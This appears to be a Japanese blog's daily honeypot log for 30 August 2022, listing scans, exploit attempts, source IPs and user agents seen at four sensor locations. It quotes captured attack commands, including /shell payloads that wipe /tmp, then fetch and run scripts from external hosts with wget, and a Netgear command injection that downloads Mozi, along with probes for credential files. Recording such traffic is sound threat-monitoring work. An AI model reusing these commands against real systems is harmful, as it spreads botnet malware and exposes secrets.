2022/08/30 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/08/30分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
.cssへのスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws

Location:US

PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://whitesecurity.xyz/674W0dF1.sh;
sh /tmp/674W0dF1.sh

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws

Location:UK

NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws

Location:SG

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：193 (前日比：50)
US：総アクセス数：103 (前日比：37)
UK：総アクセス数：94 (前日比：42)
SG：総アクセス数：85 (前日比：13)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
1	13.233.89.162	United States
27	20.82.129.90	United States
2	34.133.107.124	United States
1	35.173.50.217	United States
5	35.175.212.25	United States
1	37.44.238.185	France
4	43.138.155.236	China
1	45.95.55.245	Germany
1	45.137.22.178	Bangladesh
2	54.189.34.140	United States
1	64.227.104.242	United States
1	92.118.39.30	Romania
16	95.214.235.205	Ukraine
2	109.237.103.9	Russia
1	110.85.205.38	China
1	117.216.0.77	India
1	120.86.253.184	China
16	135.125.217.54	France
1	143.244.154.134	United States
1	147.182.184.92	United States
2	156.208.137.204	Egypt
3	167.71.167.246	United States
91	177.71.174.246	Brazil
1	192.241.208.13	United States
1	192.241.218.251	United States
1	192.241.219.87	United States
1	192.241.219.103	United States
1	192.241.221.144	United States
1	192.241.222.210	United States
1	197.33.183.87	Egypt
1	198.235.24.159	United States
1	208.67.107.247	United States
1	216.158.229.206	United States

UserAgent一覧

件数	UserAgent
12	`-`
5	`Go-http-client/1.1`
2	`Hello, World`
3	`Hello, world`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
91	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
36	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
5	`Mozilla/5.0 zgrab/0.x`
27	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01D\x01`
7		`\x16\x03\x01`
1		`\x94\xc0F9_\xeb\x8b\xd5NV<\x05z<\xda\x96F\x0eL\x97f\x0e\x97\xdc\xa6\xcf<j\x0e\x97g.L\x97f\r\x9ff\x0e\x97f\x0e\x97\xcc\x0e\x97f%\xbcf\x0e\x97N\x0e\x97f\x0e\x97f\x0e\x97f\x0e\x97g+\x0e\x97f\x18\x97f\x0e\x97f\x0e\x97f\x0e\x97f\x0e\x97f\n`
1	CONNECT	`google[.]com:443`	HTTP/1.1
2	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.config/gatsby/config.json`	HTTP/1.1
1	GET	`/.cordova/config.json`	HTTP/1.1
2	GET	`/.deployment-config.json`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/config.json`	HTTP/1.1
1	GET	`/.docker/daemon.json`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
2	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.development.local`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.docker.dev`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.php`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.sample.php`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.stage`	HTTP/1.1
1	GET	`/.env.test.localapi/.env`	HTTP/1.1
1	GET	`/.env.test`	HTTP/1.1
39	GET	`/.env`	HTTP/1.1
1	GET	`/.environment`	HTTP/1.1
1	GET	`/.envrc`	HTTP/1.1
1	GET	`/.envs`	HTTP/1.1
1	GET	`/.env~`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.gitlab-ci/.env`	HTTP/1.1
1	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
1	GET	`/.lanproxy/config.json`	HTTP/1.1
1	GET	`/.msmtprc`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`/?pp=enable&pp=env`	HTTP/1.1
1	GET	`/?pp=env&pp=env`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
2	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/config.yml`	HTTP/1.1
1	GET	`/app/config/doctrine.yaml`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/app/config/swiftmailer.yaml`	HTTP/1.1
1	GET	`/asdf.php`	HTTP/1.1
1	GET	`/aws.php`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
2	GET	`/beta/.env`	HTTP/1.1
1	GET	`/config.env`	HTTP/1.1
2	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/config/config.js`	HTTP/1.1
2	GET	`/config/config.json`	HTTP/1.1
1	GET	`/config/secrets.yml`	HTTP/1.1
1	GET	`/console/base/config.json`	HTTP/1.1
1	GET	`/console/payments/config.json`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/database.yml`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/env.backup`	HTTP/1.1
1	GET	`/env.config.js`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/helpers/utility.js`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
1	GET	`/image/lgbg.jpg`	HTTP/1.1
1	GET	`/info.json`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/infos.php`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/js/envConfig.js`	HTTP/1.1
2	GET	`/kyc/.env`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
2	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`/login.rsp`	HTTP/1.1
1	GET	`/login?pp=enable&pp=env`	HTTP/1.1
1	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/old_phpinfo.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
2	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/prod/.env`	HTTP/1.1
2	GET	`/public/.env`	HTTP/1.1
1	GET	`/public/client/planinfo`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/secrets.yml`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
3	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/skin/default_1/images/logo.png`	HTTP/1.1
1	GET	`/static/css/znwx.css`	HTTP/1.1
1	GET	`/symfony/_profiler/phpinfo`	HTTP/1.1
1	GET	`/temp.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/time.php`	HTTP/1.1
1	GET	`/twitter/.env`	HTTP/1.1
1	GET	`/wp-config.php-backup`	HTTP/1.1
2	GET	`/wp-config.php.bak`	HTTP/1.1
2	GET	`/wp-config.php.old`	HTTP/1.1
2	GET	`http[:]//azenv[.]net/`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
2	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
3	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
1	20.164.81.173	United States
1	20.164.81.176	United States
19	20.168.47.63	United States
2	35.188.195.87	United States
1	37.44.238.185	France
1	45.95.55.245	Germany
2	51.77.247.119	France
22	51.79.29.48	Canada
1	52.90.19.148	United States
1	54.37.79.75	France
1	54.189.34.140	United States
1	64.62.197.149	United States
1	66.240.205.34	United States
1	71.10.123.67	United States
2	80.87.206.248	Russia
4	94.102.49.190	United Kingdom
2	109.237.103.9	Russia
2	109.237.103.38	Russia
1	112.31.82.160	China
3	118.126.82.157	China
1	147.182.181.147	United States
2	152.89.196.62	Russia
1	159.223.114.180	United States
2	162.142.125.213	United States
2	167.94.145.60	United States
1	172.104.242.173	United States
1	175.100.20.207	Cambodia
1	185.108.106.206	India
1	185.108.106.207	India
8	185.254.196.223	Ukraine
1	192.241.204.72	United States
1	192.241.206.152	United States
1	192.241.213.157	United States
1	192.241.214.32	United States
1	192.241.216.31	United States
1	192.241.219.35	United States
1	192.241.220.132	United States
1	193.46.254.155	Romania
2	194.165.16.10	Panama
1	197.49.209.119	Egypt
1	197.58.114.160	Egypt
1	198.235.24.5	United States

UserAgent一覧

件数	UserAgent
18	`-`
5	`Go-http-client/1.1`
1	`Hello, World`
5	`Hello, world`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36`
46	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
6	`Mozilla/5.0 zgrab/0.x`
10	`python-requests/2.27.1`
2	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`MGLNDD_34.68.118.83_80\n`
2		`\x03`
1		`\x16\x03\x01\x01C\x01`
1		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1	CONNECT	`google[.]com:443`	HTTP/1.1
41	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?%3Cplay%3Ewithme%3C/%3E`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/images/cal_date_over.gif`	HTTP/1.1
1	GET	`/administrator/index.php`	HTTP/1.1
1	GET	`/application/configs/application.ini`	HTTP/1.1
1	GET	`/blog/wp-admin/install.php?step=1`	HTTP/1.1
1	GET	`/blog/wp-content/plugins/woocommerce/readme.txt`	HTTP/1.1
1	GET	`/blog/wp-content/plugins/wp-file-manager/readme.txt`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hello_kitty.html`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//whitesecurity[.]xyz/674W0dF1.sh;sh+/tmp/674W0dF1.sh`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/user/login`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/phpunit.xml`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wordpress/wp-content/plugins/woocommerce/readme.txt`	HTTP/1.1
1	GET	`/wp-admin/install.php?step=1`	HTTP/1.1
1	GET	`/wp-content/plugins/woocommerce/readme.txt`	HTTP/1.1
1	GET	`/wp-content/plugins/wp-file-manager/readme.txt`	HTTP/1.1
1	GET	`/wp-login.php`	HTTP/1.1
1	GET	`/wp/wp-admin/install.php?step=1`	HTTP/1.1
1	GET	`/wp/wp-content/plugins/woocommerce/readme.txt`	HTTP/1.1
1	GET	`/wp/wp-content/plugins/wp-file-manager/readme.txt`	HTTP/1.1
1	GET	`http[:]//34[.]68[.]118[.]83:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//azenv[.]net/`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
1	5.188.210.227	Russia
1	13.95.140.33	United States
3	20.199.108.183	United States
2	35.188.195.87	United States
1	37.44.238.185	France
3	37.44.238.187	France
1	41.40.32.24	Egypt
1	45.95.55.245	Germany
2	45.227.254.52	Belize
1	54.189.34.140	United States
1	64.62.197.185	United States
1	64.227.104.242	United States
1	66.240.192.82	United States
1	68.183.59.8	United States
2	80.87.206.248	Russia
2	109.237.103.9	Russia
1	120.48.136.210	China
1	120.86.253.152	China
7	132.145.46.98	United States
2	152.89.196.62	Russia
2	156.204.187.43	Egypt
1	163.123.143.129	United States
2	167.94.138.46	United States
2	167.248.133.44	United States
2	167.248.133.61	United States
1	172.104.242.173	United States
5	175.125.21.149	South Korea
24	177.75.220.252	Brazil
1	183.136.225.35	China
1	185.220.101.158	Germany
8	185.254.196.223	Ukraine
1	192.241.213.13	United States
1	192.241.221.35	United States
1	192.241.221.71	United States
1	192.241.222.193	United States
1	192.241.237.32	United States
1	192.241.237.85	United States
1	194.26.228.174	Russia
1	198.235.24.155	United States
1	209.141.36.112	United States

UserAgent一覧

件数	UserAgent
20	`-`
7	`Go-http-client/1.1`
4	`Hello, world`
4	`Java/1.8.0_341`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
5	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
24	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
9	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
5	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
5	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
1		`\x16\x03\x01\x01D\x01`
3		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1	CONNECT	`api[.]tvup[.]cloud:443`	HTTP/1.1
1	CONNECT	`authentication-prod[.]ar[.]indazn[.]com:443`	HTTP/1.1
1	CONNECT	`eas[.]outlook[.]com:443`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`signin[.]aws[.]amazon[.]com:443`	HTTP/1.1
11	GET	`/.env`	HTTP/1.1
1	GET	`/132.145.66.34/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
24	GET	`/phpmyadmin/`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
4	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	GET	`http[:]//azenv[.]net/`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
5	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
1	20.55.53.144	United States
1	20.116.187.106	United States
1	20.188.24.63	United States
2	34.116.92.75	United States
1	37.44.238.185	France
1	41.36.108.64	Egypt
1	41.45.59.150	Egypt
2	45.227.254.51	Belize
19	51.79.29.48	Canada
4	54.37.79.75	France
1	54.189.34.140	United States
1	62.233.50.179	Russia
1	64.62.197.164	United States
1	80.66.66.27	Russia
2	92.118.39.30	Romania
2	109.237.103.9	Russia
2	124.221.102.51	China
3	138.197.183.239	United States
2	152.89.196.62	Russia
2	160.251.50.108	Japan
2	162.142.125.221	United States
1	172.104.242.173	United States
14	185.225.73.224	Bulgaria
8	185.254.196.223	Ukraine
1	192.241.206.57	United States
1	192.241.214.41	United States
1	192.241.221.155	United States
1	192.241.222.25	United States
1	193.46.254.155	Romania
1	194.26.228.174	Russia
1	205.210.31.135	United States
1	206.189.231.139	United States
1	209.141.49.169	United States

UserAgent一覧

件数	UserAgent
15	`-`
6	`Go-http-client/1.1`
3	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
14	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0`
33	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_13.67.44.234_80`
4		`\x03`
1		`\x16\x03\x01\x01D\x01`
4		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1		`\xbeII{[\x925\x99/C}\xd64\xad\x91`
33	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/autodiscover/autodiscover.json/v1.0/1@interact.sh?Protocol=Autodiscoverv1`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hello_kitty.html`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
2	GET	`/index.php`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	GET	`http[:]//azenv[.]net/`	HTTP/1.1
4	GET	`http[:]//example[.]com/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0